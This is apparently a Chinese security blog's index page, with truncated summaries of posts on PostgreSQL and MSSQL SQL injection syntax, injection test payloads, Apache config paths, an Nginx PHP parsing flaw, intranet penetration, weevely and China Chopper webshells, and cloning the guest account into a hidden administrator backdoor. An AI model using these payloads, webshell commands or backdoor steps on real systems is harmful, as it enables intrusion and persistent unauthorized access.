摘要： 在注入中常用的几个注入语法通常有这么几个： --显示版本 --从已知表段字段爆数据 --列库 --列数据库中的表段 --列表段中的字段 --读取配置信息，例如数据库登陆账户和密码 --读写文件 那我就一个一个来讲这些Postgresql的语法是怎样的 --显示版本select version();union select 1,2,...n,version()//version()函数与MySQL的是一样的###########################################################################################回显数据举 阅读全文

摘要： 最常用的Apache路径有：/etc/httpd/conf/httpd.conf/usr/local/apache/conf/httpd.conf/usr/local/apache2/conf/httpd.conf###########################################################################################Apache 2.2 default layout (apache.org source package):ServerRoot :: /usr/local/apache2DocumentRoot :: 阅读全文

摘要： 简单判定有无漏洞： 粗略型：'复制代码 1. 数字型：and 1=1 and 1=2复制代码 2.字符型：' and '1'='1 ' and '1'='2复制代码 3.搜索型：%' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%复制代码 （PS：第三个大家可能不常用，他一般在ASP脚本中一般写成：keyword=request（”keyword”），赋值“KYO”到SQL语句中的时候即变为Select * from 表 阅读全文

摘要： 网上疯传一个Nginx的所谓文件类型错误解析漏洞，但是真的就只有这样吗？漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一 个较为 严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持 php的nginx服务器。大家在到处利用这个有趣的漏洞的时候有没有想过真的是Nginx的Bug吗？真的是Nginx文件解析错误了吗？首先看看，小顿提供的解决 方案： 第一种：修改cgi.fix_pathinfo=0第 二种：if (. 阅读全文

摘要： 1.收集信息。 1-1．不论什么途径获得的内网机器，确定他在内网后，我们首先就要了解这台机器的所属人员，如果我们的目标是公司，那我们就要了解这个人在公司里的职位，他是个什么身份，有多大的权利，这都关系到他在内网里的权限。因为，作为大公司，一个高权限的人他在内网里所要用到的东西就多，那么相对他的机器，当然权限就会比一般普通员工的高很多，这在我的渗透过程中是常见的。 既然有了他的机器，那么翻翻他的电脑这是必要的，如果你说要怎么翻，你可以尝试熟悉他的电脑甚至比他本人还熟，那你就算了解详细了。一台个人用的电脑，从上面翻出与他自己相关的一些信息，和大量公司信息应该是没有问题的，除非，这是台新电脑。 1- 阅读全文

摘要： MSSQL Injection Cheat SheetSome useful syntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This he 阅读全文

摘要： weevely 是BT5中一个常用的webshell后门连接工具，它发挥的作用类似于中国菜刀(chopper)。root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php // 生成一个密码为 ices 的php webshell.root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices// ./weevely.py http://*.com/webshell.php [password 阅读全文

摘要： 中国菜刀是实质上是一个网站数据库连接、管理程序！前提必须有网站数据库的用户名和密码（这个常关注我的博客，会找到解决方法的！），还有一个实用的小工具网站蜘蛛织出一张网站的目录结构。网站界面及操作第一步：第二步：帮助： 关于配置信息怎么填？（有一点难！） A) 数据库方面： PHP脚本： <T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 <H>主机地址<H> 主机地址可为机器名或IP地址，如localhost <U>数据库用户</U> 连接数据库的用户名，如root <P>数 阅读全文

摘要： 帐号克隆是指通过技术手段让一个普通用户拥有和管理员一样的权限和桌面，而从外表看来这个普通用户还保持原来的属性，非常具有隐藏性，是一种常见的后门形式。 下面，我手工把guest帐户克隆为管理员（administrator）,先来看下guest帐户在克隆前的状态和属性，如下图：图一图二 接着，打开注册表，找到如下键值：HKEY_LOCAL_MACHINE\SAM\SAM，现在SAM下面什么也没有。如图：图三原因是正常情况下，只有system才可以操作这个键值。现在我们来修改一下权限，让administrator拥有完全控制和权限。修改完成后，按"F5"刷新一下，现在在SAM下面 阅读全文

摘要： 大家经常测试注入大多只看了get提交的链接，post方式提交的数据的可能同我一样懒得抓包去测试，或许勤奋一点的哥们也会试试cookies注入。今天遇见了一个post提交的文本框insert注入和一朋友提起，他也是了解有点少，于是我发现大家普遍对文本框这些地方进行的注入测试比较贫乏，我这里就简单的说一下关于这个insert注入。 目标站是一个子站比较多的信息港，找了半天主站没有发现注入点，注册一个账户找到了一个上传，可惜上传页面莫名其妙的报错。看了看子站，发现都和主站一样的cms，拿wwwscan扫了扫目录，扫了扫端口发现开了3389和80以及1433，spider爬了会，也没发现可利用的，服务 阅读全文